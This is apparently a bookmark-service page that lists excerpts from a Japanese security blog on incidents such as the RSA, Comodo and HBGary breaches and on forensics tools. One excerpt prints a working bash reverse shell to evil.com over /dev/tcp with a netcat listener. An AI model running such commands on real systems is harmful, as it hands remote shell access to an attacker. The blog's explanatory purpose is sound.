サクサク読めて、アプリ限定の機能も多数!
トップへ戻る
ブックレビュー
ukky3.hatenablog.com
(2011/04/21 更新) セキュリティ企業の Trusteerが最近ブログで公表した調査結果が興味深い、というか非常に頭の痛い問題について取り上げている。 RSA and Epsilon: Research Shows Education Can’t Protect Against New Social Engineering Attacks While many experts believe that social engineering attacks can be defeated using proper user education, our research has shown otherwise. We have found that a carefully crafted attack will fool most educated users. 最近世間を騒がせて
先月、大手 CAの Comodoが外部からの攻撃によって、偽証明書を発行してしまうという事件が起こった。本記事では、この事件の問題点の整理、攻撃手法の詳細、改善策の状況などについてまとめたいと思う。 何が起こったのか? Comodoは認証局(CA)を運用し、SSLで利用される公開鍵証明書の発行などを行っている大手プロバイダの一つ。security spaceの 2010年3月のマーケットシェア調査によると、9%程でシェア5位につけている。(ちなみに GeoTrust, GoDaddy, Verisignの上位3社で50%以上を占める、寡占業界である。) その Comodoが 3/23付けの自社ブログにおいて、登録局(RA)の一つが外部から侵入されて、不正なSSL証明書が発行されてしまったことを明らかにした。(侵入が起きたのは 3/15のこと。) SSL認証局が偽の証明書を発行、大手サイトに
前回の続きをまじめに書こうと思っていたのですが、おもしろい記事を見つけたので、ちょっと脱線して今回は番外編。 SANSで Reverse Engineering Malware (REM)のコースを教えている Lenny Zeltserのブログから。 Announcing the Certified APT Nerd (CAPTN) Credential I am pleased to announce the new Certified Advanced Persistent Threat Nerd (CAPTN) credential. This certification program is designed for information security professionals looking to demonstrate their proficiency in APT
すいません、タイトルは釣りです。(^^) 実は最近、私のところにこんな文面のメールが届きました。 Dear user of FaceBook. Your password is not safe! To secure your account the password has been changed automatically. Attached document contains a new password to your account and detailed information about new security measures. Thank you for attention, Administration of Facebook. メールの差出人は "Your Facebook" でした。 「えっ、私のアカウントもハクられてしまったか!」と一瞬ドキっとしましたが(し
日本にも 「セキュリティのポッドキャスト」があった!ということを今日になって知ったわけですが。(^^; こういう試みはいいですね。応援してます。ぜひ頑張って続けてください。 ところで目を海外に転じてみると、セキュリティ関連のポッドキャストってたくさんあるんですよね。以前どこかに書いたような気がするのですが…どこにも見当たらないので、あらためて書こうと思います。ポッドキャストは隙間時間を有効活用できるし、最新情報のキャッチアップにも使えるし、英語の勉強にもなる、といいことづくめですよね。みなさんにもオススメしたいです。 以下、私がよく聞いているポッドキャストを紹介しますが、一応メインは「セキュリティ」なので、選択にかなり偏りがあることを、あらかじめお断りしておきます。 〜 総合系 〜 Security Now! (更新頻度:毎週 1回 木曜日) http://www.grc.com/secu
(2011/04/23 更新) 今月初めの 4/3頃から、「Anonymous」による Sonyへの攻撃が断続的に続いている。このエントリでは、攻撃の背景、攻撃の開始から現在までの状況について概観してみたいと思う。 (1) 攻撃の背景 今回の背景にあるのは、PS3のハッキング問題。今年の1月に iPhoneの Jailbreakなどで有名なハッカー GeoHotこと George Hotz氏が PS3のハッキングに成功。カスタムファームウェアや、Homebrew開発を可能にするための Root Keyなどを公開した。その後、ハーカー達(fail0verflowなど)から様々なツールが公開された。 この動きに対して Sony (正確には SCEA, Sony Computer Entertainment America)はすぐさま反応。1/11に GeoHot氏ほか数名のハッカーを相手に訴訟
前回のエントリーで、RSAへの攻撃手口の詳細について紹介した。RSAは顧客向けレターでもブログでも繰り返し、「攻撃は APTによるものだ」と述べている。*1 だが、そもそもこの APTとは何だろうか? APTは Advanced Persistent Threatの略で、昨年から急にメディアに露出するようになった用語だ。Google Trendsで見てみると、2009年以前にはほとんど見られない。http://www.google.com/trends?q=advanced+persistent+threat&ctab=0&geo=all&date=all&sort=0 では新しい用語なのかと思うかもしれないが、実はそうではない。TaoSecurityで著名な Richard Bejtlichさんによると、2006年頃に US Air Force (合衆国空軍)によって使われ始めたものらし
Anatomy of an Attack http://blogs.rsa.com/rivner/anatomy-of-an-attack/ RSAが APT(Advanced Persistent Threat)によって外部から侵入され、SecurIDに関する情報が漏洩した可能性があることを顧客向けレターで報告したのが、3/17(木)のこと。そして昨日(4/1)、RSA社のブログで、その攻撃手口の詳細が明らかにされた。 最初はRSA社の社員に対するスピアフィッシング攻撃が行われた。攻撃者は2つの社員グループに2日間で異なる2つのメールを送信した。この社員グループは特に注目されるような重要な地位にあるわけではない、一般社員たち。 メールのサブジェクトは "2011 Recruitment Plan" (2011年の採用計画)。メールにはファイル名が "2011 Recruitment pl
先週、元Anonymousのメンバーらによるスタートアップ backtrace securityが、現在 Anonymousで活動中のメンバーに関する情報を公開すると予告した。 (参考)Ex-Anonymous Hackers Plan To Out Group’s Members (Forbes) そして今週になって予告通りに 2つのファイルが公開された。ファイルの内容は以下の通り。 70人以上の Anonymousメンバーのハンドル名、実名、出身地、TwitterやFacebookアカウント名、などの個人情報 先月起きた HBGary事件の時の Anonymousメンバーによる IRCのログ これらのファイルは複数のファイル共有サービスを利用して配布されており、誰でも入手可能な状態になっている。 一方、この動きに対して怒った Anonymousはすぐさま反撃を開始。Twitterなどを
さっきのエントリが意外と好評だったので、調子にのって連投。(^^; 英語が苦手な方のために、2人のメールの内容を書いておく。 Gregを装った攻撃者(以下、G)と、Jussi(以下、J)のメールのやりとりはこんな感じ。わかりやすいように勝手に補足したりしているので、原文に忠実ではない。また括弧内は私の注意書き。 (下のエントリにも書いたが、Jussiは Nokiaの Chief Security Specialistで、Gregと同じく rootkit.comの root権限をもっている。) (以下、会話はすべてメールでのやりとり) G:「今ヨーロッパにいるんだけど、rootkit.comのサーバーに sshでアクセスしたいんだ。ファイアウォールの設定を変更して、59022ポートとかで sshアクセスできるようにしてくれないかな? それと rootのパスワードって、まだ xxxxxxだった
セキュリティベンダーの HBGaryが先日 Anonymousによってハックされ話題になった。HBGaryはセキュリティ研究者である Greg Hoglundがファウンダーである。彼は長年 rootkit.comを運営しているほか、Exploiting Softwareや rootkitsなどのすばらしい書籍も書いており、この業界ではかなりの有名人だ。 この事件は一体どのようにして起きたのか。きっかけは、HBGary Federalという会社が Anonymousについて調査した結果を公表しようとしたことに対する、Anonymousの報復攻撃ということのようだ。(Anonymousについてはこちらの解説が詳しい。) さて、この事件についての詳細が Anonymousによって明らかにされたようなのだが、その経緯が非常におもしろい。 Anonymous speaks: the inside s
Reverse Shell with Bash そうか、bashにはこんな機能もあったのね。使ったことないし。 ローカル(自分)側で netcatリスナーを起動。 $ nc -l -p 8080 -vvvリモート(相手)側で net redirectionを利用する。 $ exec 5<>/dev/tcp/evil.com/8080 $ cat <&5 | while read line; do $line 2>&5 >&5; doneもっと簡単にこれでも可。 $ exec 5<>/dev/tcp/evil.com/8080; sh <&5 >&5 ちょっと調べてみたら、Metasploitでも使ってた。orz reverse_bash.rbの該当部分。 return "0<&#{fd}-;exec #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datas
VMwareなどの仮想ディスクをマウントするツールとしては、Virtual Disk Driver(VDK)が古くから有名ですが、似たようなツールにImDiskがあります。コントロールパネルからイメージ操作ができるなど、VDKより使い勝手がいいのが特徴です。ただ VDKと機能的には大差ないものだと思っていたので、もっぱら私は VDKを愛用していました。つい最近までは。 ところで Live Responseツールとしてこのところよく話題にでる F-Responseは、ターゲットPCに接続されたディスクをローカルPCのディスクのように扱う機能があります。(Ji2さんのニュースレター参照。iSCSIで通信するらしい。) 実は ImDiskには Proxyモードという機能があって、これを使うとなんと F-Responseとほぼ同じことができるのです。*1全然知りませんでした。しかも使い方はいたって
EFS(Encrypting File System)はWindows2000(NTFS5)以降のOSに標準で実装されている暗号化ファイルシステムである。フォレンジック調査では時々EFSファイルを復号して調べることが必要になる。対象ファイルを利用しているユーザーが協力してくれてファイルの暗号化を解除してくれればよいが、そうでない場合にはなんらかの手段で解除を行わなければならない。ということでその方法についてまとめておく。 (注意)上記のような場合だけでなく、なんらかの手段で暗号化されたファイルを取得した第三者が、不正に解除を試みることも想定される。ユーザーはこうしたリスクも想定してどのような脅威があるのかを正確に理解しておくことが重要だ。ここでは暗号化解除を試みる側を「攻撃側」、暗号化を行ったユーザーを「防御側」と表現する。ユーザーは、フォレンジック調査で復号を行う場合には攻撃側として、自
Pen-Test用の LiveCDの定番といえば BackTrack、そして Forensics用の LiveCDといえば Helix・・・でした。昨年までは。 2008年までは無償で使えた Helixですが、e-fenseの方針が変わって2009年からはフォーラム登録ユーザ(有償)のみがダウンロードできるようになりました。で、いくつか代替ツールを探していたのですが、現時点では DEFT Linuxが最も使えそうという結論に落ち着きました。 Windows用のGUIである DEFT Extraを起動すると、次の 6つのタブが表示されます。 System Information Live Acquisition Forensics Tool Browse Contents Scan for Pictures Utility Tool どちらがマネしたのか知りませんが、Helixの GUIに中
「最近ブログの更新がとまってて寂しいですねぇ」と id:hideakiiさんに突っ込まれてしまいました。細々とですが頑張ってみます。 さて来月某所で話をすることになったので、いろいろとネタを集めています。タイムライン解析では最近 log2timelineというおもしろいツールがリリースされました。これは、Windowsの Prefetchや Restore Pointsなど各種ログ情報をもとにタイムライン(TSKの bodyfile形式)を作成するものです。フォレンジックでタイムライン解析といえば、従来はファイルシステムのタイムスタンプ情報を利用して行うのが一般的でしたが、最近はレジストリやログなどその他の情報源もあわせて解析できるようになってきました。 log2timeline The main purpose is to provide a single tool to parse v
先日のセミナーはなんとか無事に終えることができました。できれば資料を公開したいのですが、そのままだとちょっとまずそうなので(別に内容はたいしたことないのですが)、ポイントだけここにまとめておきたいと思います。(と言いながら、書いているうちに結構なボリュームになってしまいました。) なお英語では "Live Forensics" や "Live Forensic Analysis" などと呼ばれることが多いようですが、ここでは「ライブ・フォレンジック」としました。 Agenda ライブ・フォレンジックの必要性 ライブ・フォレンジックの特徴 ライブ・フォレンジックの課題 ライブ・フォレンジックの必要性 これまでの伝統的なデジタル・フォレンジックでは、調査対象となるシステムをシャットダウン(または電源断)したあと、ディスクイメージを作成して、そのイメージファイルに対して文字列の検索や削除ファイル
先日の Black Hat で受けたトレーニングの内容を簡単にまとめておきます。受講したコースはこれ。 Reverse Engineering Rootkits by Greg Hoglund, HBGary & Rich Cummings, HBGary 概要 講師:Greg Hoglund, Rich Cummings (www.hbgary.com) 日時:2008年8月4日〜8月5日 まずタイトルが紛らわしいのだが、このトレーニングコースはリバースエンジニアリングのコースではない。インシデントレスポンスのコースだと思ったほうがいい。主要なテーマは次の2つ。 Live Memory Forensics Binary and Runtime Forensics メインは2つめのバイナリ解析で、これをいかに早く(5分〜30分くらいで)行うか、という点に主眼がおかれている。そしてそれをサポ
■ DNS の再帰的な問合せを使った DDoS 攻撃の対策について 日本レジストリサービス(JPRS)からDNS関連技術情報としてDNSの再帰的な問い合わせに関する注意喚起がなされた。これは非常に困った問題だ。私は仕事でセキュリティ検査サービスを行っており、これまで多数の企業の検査に携わってきた。検査対象にはもちろんDNSサーバも含まれることが多いのだが、検査をした「ほとんど全て」のDNSサーバで外部からの再帰的な問い合わせを有効にしている。 Luis Grangeia氏によって2004年2月に行われたDNS Cache Snoopingの問題についての調査報告書では、世界中の約20万台のDNSサーバのうち約半分が RecursiveとNon-Recursiveどちらの問い合わせにも応答する"Open DNS Cache"サーバだったらしい。多分今でも状況はあまり変わってないのだろう。なぜ
(1/28, 2/5追記あり) Anonymousが昨日新たな攻撃作戦 Operation Last Resortを実施した。ターゲットになったのは United States Sentencing Commission (ussc.gov)のサイト。日本時間の昨日午後にサイトは Anonymousに掌握され、トップページは改ざんされて Anonymousのメッセージが掲載された。その後、サイトはオフラインとなったが今日になって復旧したようだ。 改ざんされた時のスクリーンショット → http://freze.it/1mT これは 2週間前に起きた Aaron Swartzの自殺により、その報復措置として行われたものだ。Anonymousはメッセージの中で、自殺の原因となったと考えられる法律の改正などを求めている。また同時に、複数の政府関連サイトから取得したと思われる機密情報を暗号化したフ
Can your computer keep a secret? Why all laptop data protection methods are NOT created equal Part I: Hard Drive Passwords Easily Defeated; the Truth about Data Protection Part II: Software Solutions for Encrypting Data at Rest Part III: Next Generation Encrypting Hard Drives HDDのデータ保護についてよくまとまった記事。Part 1ではHDDパスワードについて、Part 2では現在最も普及しているソフトウェアベースのHDD暗号化について、そして最後のPart3では最新のハードウェアベースのHDD暗号化について述べてい
というわけで、ケビン・ミトニック氏のセミナーに参加してきた。 講演タイトルは、"The Art of Deception"でソーシャルエンジニアリングがテーマ。同名タイトルの著書(「欺術」)を読んだことのある人だったら、大体想像のつく内容ではあった。それでも、スタンリー・マーク・リフキンの銀行詐欺事件(本にも出てくる)や自身がモトローラ相手にやったソーシャルエンジニアリングの手法など、実際の事例紹介を中心にユーモアあふれる語り口で90分間飽きさせることがなかった。 また興味深いデモも2つ見せてくれた。SPYBRIDGEという電話のMITM攻撃ツールのデモでは、Phishing攻撃にあったと仮定して、偽のテレフォンバンキングの番号に電話をした被害者の入力(口座番号や暗証番号)が盗聴される様子を見せていた。被害者からの電話は、このツールを経由して実際の銀行のテレフォンバンキングシステムに中継さ
スパムメール等で悪意のあるWebサイトにユーザーを誘導する受動型の攻撃で、最近は Fast-Fluxという手法が多く使われているようだ。ICANNからもアドバイザリが出ている。 SAC 025 SSAC Advisory on Fast Flux Hosting and DNS Fast-FluxはサーバのIPアドレスを次々と変えていくことによって、フィッシングなど悪意のあるサイトの存在を隠す働きをもっている。これを具体的にはDNSのTTLを極端に短くする(例えば180sくらい)ことと、Botnetを利用することで実現している。 Fast-Fluxはその形態によって Single-FluxとDouble-Fluxの2種類がある。 Single-Flux WebサーバのIPアドレスだけを変更するタイプ。攻撃に利用するドメインのAレコードを短いTTLでどんどん変えていく。この時、Aレコードに登
これは小さいながらも結構影響あるんじゃないかな。脆弱性検査のサービスで Nessusを使っているところは多いはず。その Nessusのライセンス体系が 2008年7月31日から変更される。 Tenable Network Securityのレターから • First, we will continue to enable all users to download Nessus for free. • Second, due to computers and personal networks having become ubiquitous in homes around the world, Tenable will launch a “HomeFeed” with all Nessus vulnerability plugin updates for home users at no
Fine Software Writingsでたまたま見つけた「私のモレスキンPDA」というエントリ(オリジナルはこちら)に刺激を受けて、自分でもモレスキンPDAを使い始めてみた。もちろんそのままマネするのではなく、多少自分なりにアレンジしてある。 上記のエントリでは、Moleskine Reporterを色分けしたタブで5つのセクションに分けている。 1) 次にとるアクション 2) プロジェクト 3) 旅行 / 予定表 4) メモ 5) 健康 / 馬のこと これを自分も参考にしてみた。 Moleskine Reporterを使う ページ番号を振る 色分けしたタブでセクションを分ける これらの基本アイデアはそのまま踏襲し、セクションの内容を少し変えてみた。具体的にはこんな感じ。 ToDoリスト (Next Actionsとほぼ同じ) プロジェクト いつかやる (Someday/Maybe)
このページを最初にブックマークしてみませんか?
『セキュリティは楽しいかね? Part 1』の新着エントリーを見る
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く